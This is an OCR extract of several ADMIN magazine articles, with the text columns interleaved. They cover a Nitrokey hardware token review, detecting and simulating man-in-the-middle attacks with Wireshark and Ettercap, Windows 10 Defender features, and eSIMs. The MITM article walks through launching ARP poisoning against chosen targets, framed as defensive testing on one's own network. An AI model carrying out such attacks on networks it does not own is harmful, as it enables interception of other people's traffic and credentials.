lar token) are compromised. However, small need to break into your email account (which Secrets
sites short of personnel tend to crumble under is protected by a single factor of authentica-
an avalanche of support requests from users tion) and request a reset to the bank. This Modern operating systems are quite
soon after 2FA is implemented. would downgrade 2FA to “1FA” and render messy when it comes to handling se-
The reason is that if the device that contains the whole system pointless. cret files. When you open a file with
the OTP secret is lost, the user can no longer Therefore, users who want to protect their a program, there is always the chance
access the service. Most users don’t make digital life ought to make a backup of their 2FA that the program will put pieces of
backups of their OTP secret, which means device, and administrators of sites that want the file in caches, temporary folders,
most users will eventually lose it and send a to deploy this technology need to be aware of or even the swap partition. When
support request to the website operator. the costs. The resources to be spent in a user
working with a secret file, this is
On serious websites there is no such a thing support department will probably increase
problematic.
as an automated 2FA reset. The banks I more than expected.
If you mount an encrypted volume
in a directory and open one of its
expense. (See the “Why Not 2FA?” menu in Figure 3). Hidden volumes files (e.g., with LibreOffice) pieces of
box.) are concealed filesystems that pro- the file might end up in unencrypted
vide plausible deniability, whose places of the hard drive. At the very
Encrypted File Storage existence cannot be proven, and are least, the path of the file would be
hidden within the regular encrypted added to the Recent Documents list,
The Nitrokey Storage 2 works as an storage. (See the “Is Plausible Deni- which is easily retrievable and there-
encrypted pen drive. Files stored ability Safe?” box.) The intention is fore vulnerable.
within the Nitrokey Storage 2 unit for the user to have innocuous files Live DVDs are thus a great tool for
won’t be accessible unless the correct in the regular encrypted storage and working with sensitive files: You
PIN is entered – and the number of the top secret data kept within a hid- can load the Live operating system
tries is limited to protect your data den volume. Were the Nitrokey to be and mount the encrypted volume
against theft. The Nitrokey is much
more safe than a regular pen drive for Is Plausible Deniability Safe?
storing sensitive files. The main problem with plausible deniability Game theory, then, suggests that plausible
Most home users who want to encrypt is that, although it is impossible to prove the deniability might be a liability (assuming you
the content of their USB drives opt existence of hidden information within the de- care for your hamster) because your enemies
for software solutions such as Vera- vice, it is impossible (in practice) to prove that have no reason to stop pressing on. The pos-
Crypt or dm-crypt, which are free of a hidden volume does not exist. sibility always exists that more information is
cost, quite convenient, and very safe. Imagine a terrorist organization steals your hidden that you don’t want to reveal, so the
The drawback to these tools is that Nitrokey and kidnaps your hamster. When incentive is to keep torturing your hamster.
they are vulnerable to keyloggers and they phone you and tell you they are going Meanwhile, your best alternative is not to
malware: If you enter a VeraCypt pass- to torture your hamster until you reveal reveal the passphrase because you know they
word in a computer that has a keylog- the password of the hidden volume, if the are not going to stop the torture, no matter
ger reporting your activity to an evil Nitrokey does not have a hidden volume, what you give them.
entity, your security will be broken. the terrorists will torture your hamster One idea is that plausible deniability systems of
The Nitrokey fails to counter this forever because they have no way of know- this sort are extremely valuable to the owner of
vulnerability because a PIN can be ing whether it has concealed data or you the data as long as that owner is not the person
sniffed as easily as a regular pass- are lying. who has the passphrases. For example, if you
word. Although the feature worked Even if you reveal the password of a hidden are an executive and you hand a Nitrokey to
volume, the terrorists will threaten to keep your assistant to store some top secret files on
as intended during my tests, I think
torturing your hamster unless you reveal the it, you may rest assured she won’t reveal the
it does not add much security in
password of the hidden volume stored within password of the Nitrokey, even if they threaten
this regard.
the hidden volume. (Yes, some cryptosystems to torture her hamster. She would know that
On the other hand, hidden volumes
can stack multiple hidden volumes.) talking would not save her pet.
are supported (see the systray applet

68 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Nitrokey S EC U R I T Y

within it. Once you are finished a set of OpenPGP keys within a Ni- to the features described in this
working with the encrypted files, trokey is just safer than storing them article, the Nitrokey Storage 2 can
turning the computer off erases any on your hard drive, as is the usual be used as an SSH authentication
trace of activity from the machine. practice. The hardware-enhanced token, perform certificate-based
Should the computer be stolen, the encrypted storage is a good upgrade authentication with websites, or
thief would not be able to retrieve from common software encryption authenticate into virtual private
the information. tools, as long as the files to be pro- networks (VPNs). The documenta-
tected are important enough to justify tion is barely sufficient, though, and
Conclusions the expense. although hobbyists might benefit
Its password management capabili- from using the Nitrokey, leveraging
Although encrypted storage worked ties, alongside its ability to function the full power of this device is only
well in the tests, it is arguably the with 2FA, are quite handy, but they within the reach of power users and
most expensive feature the Nitrokey don’t add much security when com- professionals. Q
has to offer. The price difference pared with software solutions.
between the Nitrokey Storage 2 and The Nitrokey is a portable solution
the Nitrokey Pro 2 is EUR60 (VAT that might help you move files be- Info
excluded), and the only meaningful tween a heterogeneous group of com- [1] Nitrokey: [https://www.nitrokey.com/]
feature the latter lacks in compari- puters. A cool feature of the Nitrokey [2] Docs: [https://www.nitrokey.com/start]
son is encrypted storage. Software Storage 2 is that it includes a nonen- [3] Platform support:
implementations that offer similar crypted partition that can be set as [https://www.nitrokey.com/download]
features, including hidden volumes, read-only. Out of the factory, it comes [4] Nitrokey on Android:
cost nothing. with a version of the Nitrokey App for [https://www.nitrokey.com/news/2017/
The main advantage the Nitrokey Windows, Linux, and macOs, which using-nitrokey-android-phones]
Storage 2 has over software imple- is convenient for using the Nitrokey [5] OpenPGP: [https://www.openpgp.org/]
mentations is that the number of on computers without an Internet [6] Nitrokeys for computer login:
times an attacker can try a password connection or that don’t make it easy [https://www.nitrokey.com/documentation/
is limited by the hardware chip, so to install third-party software. applications#computer-login]
in theory, the Nitrokey is much safer Finally, the Nitrokey is partially sup- [7] Pairing with KeePass:
because it cannot be brute forced. ported under Android. The only fea- [https://www.nitrokey.com/documentation/
However, the equivalent software ture that works on such a platform applications#password-manager]
implementations are considered un- through the OpenKeyChain applica- [8] Documented applications: [https://www.
breakable in practice, as long as good tion is the smartcard functionality nitrokey.com/documentation/applications]
passphrases are used. The increase for managing OpenPGP keys, which
of security brought by the Nitrokey is means no encrypted data storage or The Author
significant, but whether a home user password management on Android. Rubén Llorente is a mechanical engineer whose
can justify the expense is a different However, email signing and encryp- job is to ensure that the security measures of
question. tion-decryption are available. the IT infrastructure of a small clinic are both
The Nitrokey Storage 2 works as ad- The list of functions Nitrokeys [8] legally compliant and safe. He is also an Open-
vertised for the most part. Keeping can address is amazing. In addition BSD enthusiast and a weapons collector.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 69
S EC U R I T Y MITM Analysis

Detecting and analyzing man-in-the-middle attacks

Cuckoo’s Egg
Wireshark and a combination of tools comprehensively analyze your security architecture. By Thomas Joos

In man-in-the-middle (MITM) attacks, and the server. Identity theft, faked ARP Gateway
attackers place themselves between transactions, or stealing intellectual
the victim and the targeted resources, property are just a few possible results. MITM attacks often rely on the ARP
putting them in a position to intercept, These attacks can just as easily be cache, which is the local cache with
read, and possibly even manipulate performed on cable-based networks IP to MAC address assignments. Its
communications. In doing so, the at- as on WiFi, although they are par- content can be displayed at the Win-
tacker does not have to redirect the traf- ticularly common on WiFi networks dows command line by typing
fic completely or impersonate the data because public WiFi is often virtually
target. Instead, they can sniff the data unprotected. arp -a
on the network and then let it continue Before I look at possible defense
to the intended target without interfer- mechanisms and tools such as Wire- (Figure 1). On Linux computers
ence. In other words, the attacker is in shark, I’ll first look into how an
the middle of the data flow. MITM attack takes place, with tech- ip n s
As a result, many users and admin- niques such as Address Resolution
istrators do not identify these attacks Protocol (ARP) poisoning, and how does the same thing. This information
until it is too late, because in most you can detect and analyze attacks, can help detect MITM attacks because
cases, network services are not dis- which in turn can help you protect the command shows whether a MAC
rupted by the attack. Services continue your own network against MITM at- address is stored on a computer for two
to run normally while the attacker tacks and optimize your internal se- or more different IP addresses, which
accesses the traffic between the client curity structure accordingly. can be indicative of ARP spoofing.
However, any attacker can also read
and manipulate the data because the
cache has no authentication and pro-
tection. Anyone can view and change
IP addresses and the associated MAC
addresses and use them for attacks.
The example of ARP spoofing used
here plays out as follows: PC1 belongs
to the victim. It receives ARP re-
sponses from the attacker’s PC, which
pretends to be a router with a route to
the Internet. As a result, PC1 redirects
Photo by Soner Eker on Unsplash

its ARP requests to the attacker’s PC,

which forwards them to the real router
and vice versa. At the same time, the
router receives ARP responses from
the attacker impersonating PC1, which
Figure 1: The ARP cache can be displayed from the Windows command line. results in all ARP information intended

70 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 MITM Analysis S EC U R I T Y

for PC1 reaching the attacker’s PC, is a prerequisite for using Wireshark. always displayed in the window. The
which redirects the responses to PC1. An installation on Windows 10 or Name Resolution sidebar option in the
The attacker can now view and mod- 11 is possible, as well. As part of the Preferences dialog is also important.
ify all the packets received. If the data installation, Wireshark can import the You will want to enable the Resolve net-
traffic is not encrypted, intruders can latest version of Npcap. On Windows, work (IP) addresses option. Wireshark
grab login data for HTTP websites or Npcap or WinPcap has to be in place will then attempt to display the names
the content of documents with this to capture live network traffic. Wire- of the devices for the IP addresses it
approach. Additionally DNS spoofing, shark includes Npcap as of version displays.
phishing, keylogging, and many other 3.x; the older versions use WinPcap. It is crucial to enable promiscuous
attacks are possible in this way. On Windows 10/11 and Windows mode to ensure that Wireshark re-
The best way of preventing ARP Server 2016/2019, Npcap is better cords all packets on the network,
spoofing and thus MITM attacks is suited for analyzing data on the net- and not just those addressed to its
end-to-end encryption. In this case, all work in combination with Wireshark. own host system. The corresponding
the data traffic between the devices After starting Wireshark, the first step settings are also available under Cap-
involved is encrypted, and attackers is to prepare the program for the test ture | Options, where promiscuous
cannot use the intercepted data. End- (as is true for other tasks you perform mode is normally enabled, unless you
to-end encryption is made possible by with Wireshark, not just for analyzing have disabled it.
the use of protocols such as HTTPS, MITM attacks). The most important On the Output tab, you can specify
POP3S, or IMAP4S. Managed switches functions can be found in Capture | the file in which Wireshark will save
also offer the option of preventing Options. Clicking the Manage Inter- the capture. To ensure that the files
such attacks, although the security faces button opens a dialog with the do not fill up your whole disk, you
function first needs to be enabled on local interfaces that you can use for can enable automatic overwriting of
the switch. On Cisco switches, for monitoring. The Input tab provides older files with Use a ring buffer with
example, this function is known as Dy- the network interfaces that Wireshark n files. Saving the captures makes it
namic ARP Inspection (DAI). uses for sniffing. easier to analyze MITM attacks later,
Equally important is Edit | Preferences but it does not stop you capturing the
Setting up Wireshark | Capture, which is where you select attacks during live analysis.
the default network interface you want
Wireshark [1] sits on the network like Wireshark to monitor. The Update list Sniffing with Wireshark
an MITM attacker and captures data of packets in real time and Automatic
traffic, allowing you to detect patterns scrolling in live capture options ensure To start sniffing scans with Wireshark,
that could indicate an MITM attack. that the currently captured packets are just click on the icon with the shark
However, Wire-
shark is also
frequently used
by attackers be-
cause it analyzes
network packets
unobtrusively. If
an intruder uses
ARP spoofing to
route packets to
their own com-
puter, Wireshark
can analyze the
packets in the
same way – and
you can detect
these packets
on the network.
In other words,
Wireshark can
help you carry
out, prevent, or
log MITM attacks.
On Linux, the
libpcap library Figure 2: Wireshark can sniff data packets on the network to detect and carry out man-in-the-middle attacks.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 71
 S EC U R I T Y MITM Analysis

fin. Alternatively, double-click on the Wireshark’s bottom window shows Another Analysis Tool: XArp
interface from which you want to re- the IP addresses and names of the
In addition to Wireshark, tools such as XArp
cord data. Use the Stop icon to stop the computers involved. Other data pack-
help detect fake entries in ARP tables. A
scan and the File menu item to save it, ets can be read in a similar way. combination of different tools can be useful,
unless you have automated this action which together perform a comprehensive
with the settings as explained above. In Simulated Ettercap MITM analysis or stress test on your own security
the upper window, Wireshark shows
the incoming packets and, after select-
Attack architecture. One way to detect this kind of
attack is to keep a close eye on the ARP table
ing a packet, their content in the lower To understand and ultimately defend on the victim’s computer. XArp does just that,
window (Figure 2). You can enable yourself against an MITM attack, it can effectively helping to detect ARP spoofing.
filters in the upper section to ensure be helpful first to simulate an MITM at- Unfortunately, XArp is no longer being
that Wireshark lists only the data that tack yourself. Always keep in mind that maintained [3], although it might persist in
interests you. this kind of experiment on a third-party distribution repositories, or someone might
eventually revive the project.
Initial tests for detecting MITM at- network – including public WiFi – is
tacks and understanding the cor- likely to be punishable by law. On your
responding processes can consist of own network, however, the security computer. You can then track access to
monitoring how a new IP address is functions and barriers on the managed the share, see when the file is opened,
queried by DHCP, which is how cli- switches can easily be tested. Tools and view its content in Wireshark.
ents communicate with the network such as Wireshark in combination with Check the ARP cache on the computer
and DHCP servers communicate with Ettercap [2] help to flood the network beforehand with arp -a and make a
clients. The data can be displayed on- traffic with fake ARP data. The tool is note of the original MAC address of
screen thanks to Wireshark. Sniffing available for Linux and is included in the computer with the share (see the
other information that clients send to the Kali Linux distribution, as is Wire- “Another Analysis Tool: XArp” box).
servers or to other endpoints basically shark. On Ubuntu, install Ettercap with In the attack, swap the MAC address
works this way, as well. the commands: of the original computer with the MAC
Once you have started sniffing the traf- address of another computer, in this
fic, you can renew the IP address on sudo apt update case the one on which you launched
a computer that needs an IP address sudo apt install ettercap-common Ettercap. Up to this point, Ettercap
while running in Windows with: has not performed any actions but has
After starting Ettercap, you can start only read data on the network, just as
ipconfig /release the sniffing process and display the an attacker would do.
ipconfig /renew list of local network hosts (Figure 3). Next, select another computer that
Special settings are not necessary. Et- you want to sniff for the test and click
The data traffic triggered by this can tercap then displays the network de- Add to Target 2. The target definitions
then be captured. Clicking on the vices it has found, which you can use can also be seen at the bottom of the
Protocol column lets you sort, even for attacks. To start an MITM attack, window. The Ettercap computer can
without saving files or setting filters. click on a computer in the host list now sniff the data between the two
Selecting the DHCP protocol helps and select the Add to Target 1 tab. devices, and you can, in turn, analyze
you find the individual messages For an effective test, create a share and the operations with Wireshark.
between the client and DHCP server. a text file with arbitrary content on the In Ettercap’s upper right menubar
is an icon with a globe. If you click
on it, you can choose from different
MITM attacks. To test an attack, it
is best to select ARP poisoning and
confirm that you want to start. The
attack is now active and can be ob-
served with Wireshark. Ideally, you
will want to launch Wireshark on the
computer that is running Ettercap.
This attack can also be done with
Kali Linux, as mentioned before; both
tools are integrated. At any time, you
can stop ARP poisoning in Ettercap
or define other targets. After stopping
the attack, the selected target systems
again have the correct MAC address
Figure 3: Ettercap helps perform MITM attacks, which you can then analyze with Wireshark. assignments after a short time.

72 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 MITM Analysis S EC U R I T Y

Laughing Third Party machine also ends ARP poisoning, and trying to duplicate MAC addresses. If
the attack is no longer visible. you click on such packets, the original
Launching Wireshark in parallel on MAC address of the respective systems
the computer that you have defined Filters can also be found during the analysis.
as Target 2 is the easiest way to trace
the attack. Open the share you cre- Wireshark is as useful a tool for per- Conclusions
ated earlier and the file on the Target forming MITM attacks as it is for ana-
2 computer, which is exactly what us- lyzing them. For this reason, it makes Wireshark is the ideal tool when it
ers would do when accessing data on sense to take a close look at the tool’s comes to capturing network traffic
the network. The two Wireshark in- capabilities. One important feature is and can also be used to analyze MITM
stances capture the actions performed the filters: If you enable an ARP filter attacks. With its various filters, you
in the background. in Wireshark, using the example of can determine whether data on the
If you again query the ARP cache on the attack described previously, you network shows signs of such attacks.
the Target 2 computer by typing arp can focus on the ARP-related network Together with software such as XArp
-a, you will see that during an active traffic (Figure 4). If you then use the and Ettercap, you can perform stress
MITM attack courtesy of Ettercap, the SMB or SMB2 filter, you will also see tests on your own network to check
MAC addresses for Target 1 are identi- the SMB traffic between the clients. your internal security situation. Q
cal to those of the Ettercap computer. With the SMB filter, all exchanges be-
The MITM computer has succeeded tween Target 1 and Target 2 show up,
with its ARP attack and can spoof including the content of the text file Info
another computer. The client you de- created and opened for this test. [1] Wireshark: [https://www.wireshark.org]
fined as Target 2 assumes that the Kali Wireshark also has the filters arp. [2] Ettercap: [https://www.ettercap-project.org]
computer with Ettercap is the Target 1 duplicate-address-frame and arp. [3] XArp: [http://www.xarp.net]
computer with the active share, allow- duplicate-address-detected, which tell
ing traffic to be recorded on the Kali Wireshark to display, from a saved The Author
computer, even though the data is run- or live capture, the packets that have Thomas Joos is a freelance IT consultant and
ning back and forth between Target 2 duplicate MAC addresses for different has been working in IT for more than 20 years.
and Target 1 and the Kali computer is IP addresses. Precisely this informa- In addition, he writes hands-on books and
not involved – a typical MITM case. tion can be seen in the Info column. If papers on Windows and other Microsoft topics.
Other computers will not notice this you find such packets on the network, You can meet him online at [http://thomasjoos.
activity because the attack does not you can assume that an attacker is spaces.live.com].
disturb the net-
work. The entries
you have made
let the computer
with Ettercap
and its active
Wireshark in-
stance read data
that is exchanged
between Target
1 and Target 2.
If the data is not
encrypted, the
Wireshark in-
stance on the Et-
tercap/Kali client
will help you ex-
tract the content
of the data pack-
ets. You will find
the correspond-
ing captures on
the Kali/Ettercap
computer. Clos-
ing Ettercap
on the MITM Figure 4: An MITM attack can be detected quite quickly by changing the display filters for ARP and SMB.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 73
 S EC U R I T Y Win 10 Endpoint Security

Endpoint Security for Windows 10

Well-Tempered
Computer

Windows 10, build 21H1, has numerous protection mechanisms out of the box. We look at the option
for delaying updates, the components and features of Microsoft Defender, and recommendations for
hardening the operating system. By Marc Grote

Microsoft introduced a number of new different times in the second half of effect on your operation. IT managers
security features in Windows 10, but the month. Therefore, you can con- can use local settings on the client or
they are not available in all variants centrate on installing the critical up- group policy to delay updates.
of the operating system. For example, dates and install the optional updates
features such as Windows Defender at a later point in time, once their Authentication Options
Device Guard – now Microsoft De- compatibility with the IT infrastruc-
fender Application Control – or Mi- ture has been successfully checked. In addition to the classic username
crosoft Defender Credential Guard are Windows Update for Business [1], and password option to authenticate
only available in Windows 10 Enter- the update process for business cus- the system, Windows 10 provides
prise E3/E5; Microsoft Defender for tomers, includes what are known other options (Figure 1). In work-
Endpoint – formerly Advanced Threat as update rings, which you can use group environments, for example, a
Protection – is only available with to specify the order in which you picture password can be used. You
Windows 10 Enterprise E3/E5, Micro- want to patch end devices and serv- can choose a picture for logging in
soft 365 E5 Security, and Microsoft ers. These rings let you, for example, or define various gestures that are
365 E5. Also not to be ignored is that patch only unimportant computers known only to you and use them for
Microsoft only allows the Enterprise or special test machines in an initial authentication. Microsoft equates
version to use group policies that can update wave. Update rings also allow picture passwords with the PIN entry
configure the Windows Store. systems to be patched as a function of method in terms of security.
how they interact. For example, a do- Windows Hello [2] is a facial recogni-
Windows Update for main controller can be patched first, tion feature that automatically logs
followed by an Exchange server that the user into the operating system
Business requires the Active Directory (AD) when a known face is detected. As
The monthly patch day still causes services to work properly. an alternative to facial recognition,
Lead Image © Galina Peshkova, 123RF.com

excitement among many adminis- Windows Update for Business also the eyes (iris) or fingers (fingerprint)
trators, as does the question as to lets you define maintenance windows can be scanned for identification.
whether everything will continue during which computers receive Microsoft decided on this additional
to work as it did before the update. updates, so you can select the time authentication option because pass-
Microsoft has changed the update windows when the service interrup- words have long since ceased to pro-
cycle for Windows 10. Apart from tions associated with the update in- vide sufficient security if users do not
the monthly critical updates, the stallation, in the form of computer or implement all the requirements for
company releases optional updates at service restarts, will have little or no their secure use. You need the right

74 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Win 10 Endpoint Security S EC U R I T Y

kind of device to run Microsoft Hello, In Windows 10, Mi-

such as an integrated iris or finger crosoft Defender has
scanner. In AD environments, Win- become a strategic
dows Hello can be implemented with product and has
the help of group policies. been extended with
Microsoft Passport is a multifactor numerous features,
authentication (MFA) system that which I will describe
uses a PIN or biometrics (provided in more detail in the
by Windows Hello) in conjunction following sections
with encoded keys from a device for of this article. The
authentication. Users can use it to au- components include
thenticate against a local AD, Azure Defender Security
Active Directory (AAD), or non-Mi- Center, Defender for
crosoft LDAP service. Endpoint, Defender
Windows 10 clients can also join an Application Control,
AAD and use it as their exclusive Defender Credential
authentication source. A client’s Guard, Defender Ex-
membership in the AAD then enables ploit Guard, and De-
single sign-on (SSO) to various ser- fender SmartScreen.
vices, such as Office 365 in the Micro- Figure 1: Logon procedures are numerous and vary in usefulness
soft cloud. In environments with an Defender depending on the end device.
on-premises AD and AAD, a synchro-
nization instance ensures that SSO is
Security Center measures and cloud technologies in a
still guaranteed for on-premises and In version 1703, Microsoft has com- single tool.
cloud resources. bined various Windows security func- Features include anomaly detection
tions in the Defender Security Center capabilities (registry, filesystem, and
Endpoint Protection [3] and made them easily accessible network access) and security analysis
in a central interface. The Defender capabilities in the Microsoft cloud
Microsoft Defender is an integral part Security Center combines the follow- (Bing and SmartScreen reputation,
of Windows 10 and helps protect the ing functions: Microsoft Malicious Software Re-
computer against malware in two ways: Q Defender features: virus and threat moval Tool, and threat intelligence).
Q Real-time protection: Microsoft protection. Microsoft Defender for Endpoint
Defender blocks malware that tries Q Device performance and health: in- also supports security features such
to install or run on the PC and formation about device drivers and as AppLocker or Device Guard. The
notifies the user. The user is also Windows update states, as well as configuration is handled by group
notified if apps try to change im- battery status on mobile devices. policies, System Center Endpoint Con-
portant settings. Q Firewall and network protection: figuration Manager, scripts, mobile
Q Various scanning options: Microsoft Defender firewall state with ad- device management (MDM) tools, or
Defender automatically checks at vanced security. Microsoft Intune.
regular intervals for whether mal- Q App & browser control: configura- Whereas Microsoft Defender for
ware is installed on the PC. The scan tion in Defender SmartScreen for Endpoint is a cloud-based service,
can be started at a different time, if apps, files, and the Edge browser. Microsoft Advanced Threat Analyt-
desired. Microsoft Defender auto- Q Family options: controlled access ics (ATA) is a local service installed
matically removes or quarantines all to web pages, time control for ap- on servers in the IT infrastructure
suspicious objects detected during a plications, and allowed access to to detect suspicious activities on the
scan. Users and administrators can applications for children. network in real time. ATA comprises
manually remove objects from the the ATA Gateway or ATA Lightweight
quarantine, or the objects located Defender for Endpoint Gateway, ATA Center, and other
there are automatically deleted after components, some of which are
a definable period of time. Microsoft Defender for Endpoint optional. The core functionality in-
The Microsoft Defender interface (formerly Windows Defender Ad- volves all domain controllers in the
largely matches that of older Win- vanced Threat Protection) [4] service enterprise mirroring their network
dows Defender versions. However, for Windows 10, as of version 1607, traffic to the ATA gateway. ATA re-
the configuration of Defender options helps you detect attacks on a network cords the data in a database, clearly
is now done in the Windows 10 set- and initiate appropriate countermea- displays the findings in the ATA Cen-
tings menus and not in the Defender sures. Microsoft Defender for Endpoint ter, and points out threats and pos-
application itself. combines Windows 10 protection sible countermeasures.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 75
 S EC U R I T Y Win 10 Endpoint Security

virtualization extensions, extended

page tables, and a Windows hy-
pervisor.
Q Secure boot
Q Trusted Platform Module (TPM)
2.0 (recommended)
Q Unified Extensible Firmware Inter-
face (UEFI) lock (recommended)
Defender Credential Guard is config-
ured by group policies.

Defender Exploit Guard

Defender Exploit Guard (WDEG)
[7] is provided by Microsoft starting
with Windows version 1709. WDEG
Figure 2: The Advanced Threat Analytics console quickly identifies security incidents in the provides a set of host intrusion pre-
directory service. vention features to reduce the attack
surface on user applications. It is the
Defender Application Control strengths because it is not possible to successor to the Enhanced Mitigation
infiltrate the check process itself. Experience Toolkit (EMET), which
The technology behind Defender Ap- Microsoft also makes available for
plication Control (WDAC) [5] is also Defender Credential Guard free download for older versions of
intended to prevent malware from Windows to protect against exploits
running on and thus infiltrating the sys- Defender Credential Guard [6] is one in applications that use techniques
tem. The tool is primarily intended to of the most important newer features such as data execution prevention,
protect against new and unknown mal- in Windows 10. It also uses Hyper-V address space layout randomiza-
ware and Advanced Persistent Threats virtualization-based security features tion, structured exception handling
(APTs). WDAC thus provides increased to isolate secrets
protection in Windows 10 because it such as passwords,
prevents any untrusted or non-digitally- password hashes,
signed app from running, including and Kerberos ticket-
portable apps that run off a USB stick granting tickets and
without a local installation. gives access only to
Administrators can specify the source privileged system
from which apps are considered processes. NTLM
trusted. Both universal apps and Win32 (new technolo-
apps can be protected with WDAC gies LAN manager)
in this way. When an application is hashes or the well-
executed, WDAC checks its trustworthi- known pass-the-hash
ness. An application is considered se- or pass-the-ticket
cure if it has a digital signature from the attacks are no longer
manufacturer or the Windows Store, possible in this case
and organizations can define their own (Figure 2). Defender
applications as secure. Administra- Credential Guard
tors use central policies to determine requires the use of
which apps are trusted and how WDAC Windows 10 Enter-
should be configured in the enterprise. prise or Windows
WDAC protects itself against tamper- Server 2016 and has
ing with hardware and virtualization the following hard-
technologies to isolate the process from ware requirements:
all other components. Because WDAC Q Virtualization-
uses Hyper-V as its base, client systems based secu-
need to meet all the requirements for rity (VBS):
enabling the Hyper-V role. Compared VBS requires
with other Microsoft technologies a 64-bit CPU, Figure 3: Defender Exploit Guard is configured in the Defender
(e.g., AppLocker), WDAC plays to its enabled CPU Security Center.

76 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Win 10 Endpoint Security S EC U R I T Y

overwrite protection, and others. Recommendations for new security features in addition
WDEG can be configured in the De- to those already built-in and, as a
fender Security Center (Figure 3).
Windows 10 result, has achieved a better level of
Defender Exploit Guard extends the The majority of successful attacks protection than in older operating
security features provided with EMET on systems with Windows 10 can al- system versions. The semiannual
to include Control Flow Guard, which ready be detected or prevented with updates and the ever-increasing
provides protection against memory the on-board tools available in the integration with Azure Cloud make
corruption by restricting where ap- operating system. To make it easier Windows 10 one of the most secure
plications can execute program code to configure the operating system operating systems on the market.
and extends existing exploit preven- appropriately, the German Federal Unfortunately, many features re-
tion technologies. Office for Information Security (BSI) quire the use of the Enterprise ver-
recently published recommended ac- sion and cloud integration. Q

Defender SmartScreen tions for securing Windows systems:

SiSyPHuS Win10: Study on System In-
SmartScreen has been part of the tegrity, Logging, Hardening, and Se- Info
operating system on clients and serv- curity-Relevant Functionality in Win- [1] Windows Update for Business:
ers for several Windows versions and dows 10. [9] One focus in creating [https://docs.microsoft.com/en-us/
was renamed Microsoft Defender this was on ease of implementation windows/deployment/update/
SmartScreen [8] in Windows 10. The and practical application. For this rea- waas-manage-updates-wufb]
tool helps prevent access to websites son, the BSI makes the recommended [2] Windows Hello: [https://support.microsoft.
that have been reported as phishing configuration settings available for com/en-us/windows/learn-about-windows-
or malware spreaders and blocks the download as group policy objects that hello-and-set-it-up-dae28983-8242-bb2a-
download of potentially dangerous can be imported directly. d3d1-87c9d265a5f0]
files. Defender SmartScreen deter- In the security analysis, BSI examines [3] Defender Security Center:
mines whether a web page is poten- the security-critical functions of the [https://docs.microsoft.com/en-us/
tially dangerous as follows: operating system. The goal is to be windows/security/threat-protection/
Q Analyzes web pages visited and able to evaluate the security and re- windows-defender-security-center/
searches for indications of suspi- sidual risks for using Windows 10, to windows-defender-security-center]
cious behavior. If this is the case, identify framework conditions for se- [4] Defender for Endpoint: [https://docs.
SmartScreen displays a warning cure use of the operating system, and microsoft.com/en-us/microsoft-365/
page and advises caution. to create practically applicable advice security/defender-endpoint/microsoft-
Q Compares web pages visited with for hardening and secure use. The defender-endpoint?view=o365-worldwide]
a dynamic list of reported phishing recommendations from SiSyPHuS are [5] Defender Application Control:
and malware portals. In case of a primarily aimed at federal and state [https://docs.microsoft.com/en-us/
match, SmartScreen also displays authorities, as well as companies. windows/security/threat-protection/
a warning that the website may be However, technically savvy citizens device-guard/introduction-to-
malicious. can also implement the listed points, device-guard-virtualization-based-
SmartScreen tries to determine depending on the Windows 10 version security-and-windows-
whether a downloaded app or app they are using. defender-application-control]
installer might be dangerous in the The recommendations, Group Policy [6] Defender Credential Guard:
following ways: objects (GPOs), and other partial re- [https://docs.microsoft.com/en-us/
Q Compares downloaded files with sults of the study that have already windows/security/identity-protection/
a list of reported websites and been published are available on the BSI credential-guard/credential-guard]
programs with malware known website [9]. The BSI intends to publish [7] Defender Exploit Guard:
to be unsafe. In case of a match, further conclusions from other parts of [https://docs.microsoft.com/en-us/
SmartScreen displays a warning to the study successively. The analyses microsoft-365/security/defender-endpoint/
that effect. include components such as Power- enable-exploit-protection?view=o365-
Q Compares downloaded files with Shell, the application compatibility worldwide]
a list of known files downloaded infrastructure, driver management, and [8] Defender SmartScreen:
by many Windows users. If the file PatchGuard. The subject of the study [https://docs.microsoft.com/en-us/
does not appear in this list, Smart- was Windows 10 Enterprise LTSC 2019, windows/security/threat-protection/
Screen displays a warning and ad- 64-bit, German-language version. microsoft-defender-smartscreen/
vises caution. microsoft-defender-smartscreen-overview]
SmartScreen is configured by Active Conclusions [9] BSI: SiSyPHuS project (in English):
Directory group policies or a mobile [https://www.bsi.bund.de/EN/Topics/
device management tool such as Mi- Microsoft has made an effort in Cyber-Security/Recommendations/
crosoft Intune. Windows 10 to expand the list of SiSyPHuS_Win10/SiSyPHuS_node.html]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 77
 M A N AG E M E N T eSIMs

eSIMs in the enterprise

Card Change
In this overview, we look at the opportunities eSIM technology offers for the mobile workplace and what IT
managers need to watch out for in deployment and management. By Marco Föllmer
The COVID-19 crisis and 2020 have Technologies for remote commission- by other manufacturers, as well. In
changed the world of work. In re- ing of devices already exist, and cor- 2018, the eSIM then gained further
sponse to the virus, many companies porations could do worse than deploy popularity when Google and Apple
introduced long-term home office them in line with requirements. One brought it to their smartphones.
work models for their teams for the such technology is the eSIM, which Today, increasing numbers of smart-
first time. Today, it is clear that the offers employees, companies, and phones, tablets, and smartwatches
legacy 9-to-5 working model in the their IT administration teams the op- can use an eSIM, and the numbers
office is a thing of the past for many. portunity to simplify mobile work. continue to increase. According to
Even when new people join the com- a study by Juniper Research, global
pany, their first day at work often no eSIM-Enabled Devices on usage is expected to rise from 1.3 bil-
